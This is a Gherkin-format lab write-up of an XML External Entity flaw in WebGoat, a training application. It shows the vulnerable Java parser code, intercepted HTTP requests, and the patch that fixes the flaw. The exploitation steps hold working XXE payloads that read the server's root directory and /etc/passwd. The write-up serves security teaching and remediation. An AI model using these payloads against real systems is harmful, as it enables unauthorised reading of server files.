## Version 1.4.1
## language: en

Feature:
  TOE:
    WebGoat
  Category:
    Injection Flaws
  Location:
    /WebGoat/xxe/simple - XML body
  CWE:
    CWE-611: Improper Restriction of XML External Entity Reference
  Goal:
    Get files from the server through XXE
  Recommendation:
    Restrict XML External Entities in user input

  Background:
  Hacker's software:
    | <Software name>       | <Version> |
    | Kali Linux            | 2017.3    |
    | Firefox Quantum       | 64.0b14   |
    | Burp Suite CE         | 1.7.36    |
    | WebGoat               | 8.0       |
  TOE information:
    Given I am running WebGoat on http://localhost:8080

  Scenario: Normal use case
    Given I go to http://WebGoat/start.mvc#lesson/XXE.lesson/2
    Then I see a picture and a comment box
    Then I submit a comment
    And it appears in the comment list below

  Scenario: Static detection
  Unsanitized XML input
    Given I check the code in
    """
    webgoat-lessons/xxe/src/main/java/org/owasp/webgoat/plugin/Comments.java
    """
    And see the code that parses the XML requests
    """
    62  protected Comment parseXml(String xml) throws Exception {
    63    JAXBContext jc = JAXBContext.newInstance(Comment.class);

    65      XMLInputFactory xif = XMLInputFactory.newFactory();
    66      xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES,
            true);
    67      xif.setProperty(XMLInputFactory.IS_VALIDATING, false);

    69      xif.setProperty(XMLInputFactory.SUPPORT_DTD, true);
    70      XMLStreamReader xsr = xif.createXMLStreamReader(
            new StringReader(xml));

    72      Unmarshaller unmarshaller = jc.createUnmarshaller();
    73      return (Comment) unmarshaller.unmarshal(xsr);
    74  }
    """
    Then I notice IS_SUPPORTING_EXTERNAL_ENTITIES is enabled
    Then I know it's probably vulnerable to XXE

  Scenario: Dynamic detection
  Detecting XXE
    Given I intercept a POST request to the target URL with Burp
    And I see the request
    """
    POST /WebGoat/xxe/simple HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/
    65.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1:8080/WebGoat/start.mvc
    Content-Type: application/xml
    X-Requested-With: XMLHttpRequest
    Content-Length: 58
    Connection: close
    Cookie: JSESSIONID=AD96039E46A3DF4541423A52D68ADB18;
    BEEFHOOK=sPHOtf4WZ9fRh2UjERRZ6BnmNPJLA6QodYTIyeHINl2ARB9X8B15XTd3ZITqq7CWMcz
    xQSjSeGdfc9De

    <?xml version="1.0"?><comment>  <text>das</text></comment>
    """
    Then I edit the request to inject an External Entity that lists files in "/"
    """
    POST /WebGoat/xxe/simple HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox/
    65.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1:8080/WebGoat/start.mvc
    Content-Type: application/xml
    X-Requested-With: XMLHttpRequest
    Content-Length: 58
    Connection: close
    Cookie: JSESSIONID=AD96039E46A3DF4541423A52D68ADB18;
    BEEFHOOK=sPHOtf4WZ9fRh2UjERRZ6BnmNPJLA6QodYTIyeHINl2ARB9X8B15XTd3ZITqq7CWMcz
    xQSjSeGdfc9De

    <?xml version="1.0"?><!DOCTYPE foo [
      <!ENTITY xxe SYSTEM "file:///">
    ]><comment>  <text>&xxe;</text></comment>
    """
    Then I forward the request
    And see the directories at "/" listed in a comment [evidence](ls.png)

  Scenario: Exploitation
  Get /etc/passwd from server
    Given I know the machine is vulnerable to XXE
    Then I forge a request that outputs /etc/passwd
    """
    POST /WebGoat/xxe/simple HTTP/1.1
    Host: 127.0.0.1:8080
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:65.0) Gecko/20100101 Firefox
    /65.0
    Accept: */*
    Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3
    Accept-Encoding: gzip, deflate
    Referer: http://127.0.0.1:8080/WebGoat/start.mvc
    Content-Type: application/xml
    X-Requested-With: XMLHttpRequest
    Content-Length: 132
    Connection: close
    Cookie: JSESSIONID=AD96039E46A3DF4541423A52D68ADB18; BEEFHOOK=sPHOtf4WZ9fRh2
    UjERRZ6BnmNPJLA6QodYTIyeHINl2ARB9X8B15XTd3ZITqq7CWMczxQSjSeGdfc9De

    <?xml version="1.0"?>
    <!DOCTYPE foo [
          <!ENTITY xxe SYSTEM "file:///etc/passwd">
        ]>
    <comment>  <text>&xxe;</text></comment>
    """
    Then I forward it
    And get the contents of "/etc/passwd" in a comment

  Scenario: Remediation
  Disable external Entities
    Given I patch the code like so
    """
    ...
    66      xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES,
            false);
    67      xif.setProperty(XMLInputFactory.IS_VALIDATING, true);
    ...
    """
    Then I try to list "/" again and it doesn't work
    Then the vuln is patched
  Scenario: Scoring
  Severity scoring according to CVSSv3 standard
  Base: Attributes that are constants over time and organizations
    9.9/10 (Critical) - AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:L/A:H/
  Temporal: Attributes that measure the exploit's popularity and fixability
    9.5/10 (Critical) - E:H/RL:O/RC:C/
  Environmental: Unique and relevant attributes to a specific user environment
    9.5/10 (Critical) - CR:M/IR:M/AR:M

  Scenario: Correlations
    No correlations have been found to this date 2018-12-18